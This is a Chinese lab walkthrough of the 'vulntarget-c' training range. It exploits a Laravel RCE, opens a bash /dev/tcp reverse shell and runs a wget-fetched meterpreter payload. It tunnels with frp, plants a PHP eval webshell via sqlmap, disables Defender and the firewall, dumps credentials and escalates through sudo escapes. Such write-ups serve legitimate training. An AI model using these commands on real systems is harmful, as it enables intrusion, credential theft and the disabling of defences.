首页 > 其他分享 >vulntarget-c-wp

vulntarget-c-wp

时间:2023-05-22 09:22:38浏览次数:583  
标签:web 130.5 sudo elf 192.168 wp vulntarget REG

vulntarget-c

信息收集

扫开的端口有web服务

image-20230406103050060

访问了web页面,发现用的是laravel框架

image-20230425140301701

搜索一下历史漏洞,在gayhub上找到这个可以用,能够执行简单命令

python3 exploit.py http://192.168.130.6:80 Monolog/RCE1 "whoami"

image-20230406105423806

直接反弹shell不成功,可能是路径下没有权限。切换到web的目录下面,本地生成msf的马子再开一个 http服务给下载,切换路径后执行即可上线msf

cd+/var/www/html/public+&&+bash+-i+>&+/dev/tcp/192.168.130.5/9999+0>&1
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.130.5 lport=7777 -f elf -o 1.elf
handler -p linux/x64/meterpreter/reverse_tcp -H 192.168.130.5 -P 7777
cd /var/www/html/public && wget http://192.168.130.5:90/1.elf && chmod +x 1.elf && ./1.elf

image-20230406111534859

发现有第二张网卡是10.0.20.0这个网段的

image-20230406111654034

扫了这个网段又有一台开了web服务端机子(10.0.20.100)

image-20230422215803771

由于msf自带的路由模块太卡了进不去,就换frp上去

upload /root/Desktop/frp_0.47.0_linux_amd64/frpc.ini /var/www/html/public/testc.ini

[common]
server_addr = 192.168.130.5
server_port = 7000

[http_proxy]
type = tcp
local_ip = 10.0.20.141
local_port = 8888
remote_port = 8888
plugin = socks5


[common]
bind_addr = 192.168.130.5
bind_port = 7000

访问到web页面有登录的地方,尝试了几个弱口令没成功

image-20230425140801156

找到登录界面上burpsuite爆破密码,得到弱口令admin123

image-20230425142222153

成功登录后台

image-20230425142640595

在inquires处有sql注入

image-20230425150654166

挂上代接着用SQLmap跑拿下shell,使用--os-shell这个参数的时候会生成两个文件,一个是后门一个可以上传文件

image-20230425151208150

但是直接传cs的马子传不上去,一句话也不行,可能是有杀软。列出来果然有有defender

image-20230522082417855

echo ^<^?php $a = $_REQUEST['110'];$a = "$a";$b['test'] = "";eval($b['test']."$a");?^>^ > index.php

image-20230522002012880

搞了几个免杀试了一下都被干掉了,就直接上才艺干掉defender,而且现在权限正好不用去提,之后传mimikatz抓凭据

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD

image-20230522011805302

解密得到Admin#123

image-20230522011921896

开完3389要同时关了防火墙或者添加一条规则放行,然后连接出现这个连接问题

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -ano | findstr 3389
netsh advfirewall set allprofiles state off

image-20230522080323434

使用这个REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f来禁用RDP-Tcp连接的安全层再重启之后也还是连不上。可是使用下面这个时,它的作用本来应该是将RDP-Tcp连接的用户身份验证方式更改为不需要验证,虽然可以连接上了但是还是要输入凭证。上来之后看到了任务栏有个远程连接工具MobaXterm,密码是本机密码

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

image-20230522020414874

能够ping通域控,也能直接连过去但是权限很低

image-20230522021243811

从设置这里可以看到连过去域控的密码

image-20230522022223438

像有一个普通用户的情况下先尝试尝试sudo提权,成功率很高。首先尝试man输入sudo man man,之后输入刚刚拿到的密码vuln@qwe回车之后输入!再回车

image-20230522023145388

出来就已经是root权限了

image-20230522023320614

其他的如taskset也可以

sudo taskset 1 /bin/sh -p

image-20230522082828071

还有sed,都很快而且很简单,其他的可以参考这里去查询

sudo sed -n '1e exec sh 1>&0' /etc/passwd

image-20230522082945360

然后拿到root权限之后找到flag,flag里面有提示一个cve-2021-3493

sudo bash -p
find /* -name "*flag*"

image-20230522083242376

编译了之后从kali传过去但是不行,报找不到相应的so文件

image-20230522023101738

尝试前几个成功率高的,结果都是缺东西

image-20230522090123848

应该是要找Ubuntu的环境来编译才行,

image-20230522090457237

标签:web,130.5,sudo,elf,192.168,wp,vulntarget,REG
From: https://www.cnblogs.com/bktown/p/17419723.html

相关文章

  • WPF 依赖属性
    一、简介在WPF中,最常见属性就是依赖属性,支持数据绑定的属性都是依赖属性,像Button的Content就是一个依赖属性DependencyProperty。依赖属性没有值,可以依赖绑定源来获取值换句话说,只有依赖属性支持数据绑定,当我们需要一些特殊的属性而该控件没有时,就可以为其添加一个依赖......
  • 一步一步使用Ext JS MVC与Asp.Net MVC 3开发简单的CMS后台管理系统之创建Viewport(1)
    忙活了那么久,终于进入正题,ExtJSMVC开发。开始前,先说说4.1.1的一点点变化。在4.1的时候,要先创建一个扩展于Ext.app.Application的类,然后用create创建它的实例来开始应用程序的。而在4.1.1,则可直接调用application方法开始执行应用程序,简化了。调用application方法,其参数是一个配置......
  • 用Wpf做一个画笔画板(续5-Diagram画板)
    先上效果图吧同样老规矩,先上源码地址:https://gitee.com/akwkevin/aistudio.-wpf.-diagram本次实现的内容有[1]画笔实现[2]封闭画笔实现[3]钢笔实现[4]文字画笔[5]直线,矩形,椭圆[6]Path形状[7]取色器[8]三种画笔可选画笔示例入口  示例截图 核心代......
  • WPF.Basic.数据绑定
    WPF常用五种数据绑定方式 绑定方式一(绑定元素依赖属性)<StackPanel><SliderName="s1"Value="10"Maximum="100"></Slider><TextBlockFontSize="{BindingElementName=s1,Path=Value}"Text="看着我">......
  • WPF.Basic.依赖属性
    1依赖属性定义  在WPF界面的数据绑定中,为了能够使绑定源数据和绑定目标在变更后能够通知对方,.net在原来的属性之上设计了依赖属性    所以支持绑定的属性本质上它都是封装后的依赖属性。那么也就是说,只有依赖属性才可以进行绑定。  1依赖属性使用publiccl......
  • Android之ActionBar、Tabs、Fragment、ViewPager实现标签页切换并缓存页面
    感觉Android到处都是坑,每个地方都要把人折腾半天。今天来简单说说Android之ActionBar、Tabs、Fragment、ViewPager实现标签页切换并缓存页面关于他们的介绍就不多说了,网上到处都是,只说关键的部分:我在开发的时候遇到几个疑难问题,花费大量时间处理,总结如下:1.关于Fragment内部......
  • office与WPS的区别
    声明本篇主要是为了科普下WPSoffice与MSoffice。博主使用的WPS后续也将使用其讲解。如有不妥,欢迎评论。概要大众使用的办公软件目前大致是MSoffice和WPSoffice。学哪一个我感觉都差不多,毕竟它们两者基础功能都差不多(不考虑金钱的话嘿嘿)。MSoffice全称为MicrosoftOf......
  • CTF 在线平台 WEBwp
    1.web_Unagi知识点,xxe编码绕过这道题看到uplaod里面的example,很明显就是xxe了,提示是把/flag读出来。 第四个页面告诉我们flag在/flag中发现上传的是xml,于是自己构造1.xml 这是我们平常用的xxe,但是这个提示是被过滤了,构造完了之后上传发现被WAF拦截了 这里通过XX......
  • CTF 在线平台密码wp
    1.变异凯撒加密密文:afZ_r9VYfScOeO_UL^RWUc格式:flag{}考点:凯撒加密变式恺撒密码表是一种代换密码。通过把字母移动一定的位数来实现加密和解密。明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移后被替换成密文。由于密文中有下划线和阿拉伯数字,所以推测应该......
  • CTF 在线平台miscwp
    1.图片处理下载附件之后,得到一个gif动图。使用Stegsolve打开。使用gif动图工具,然后一张一张的向后翻, 得到flag{he11ohongke}2.二维码下载附件之后是一个zip压缩包。解压之后得到了一个png的二维码图片。该是有东西藏在图片里面,直接拖到winhex打开。 发现里面有一......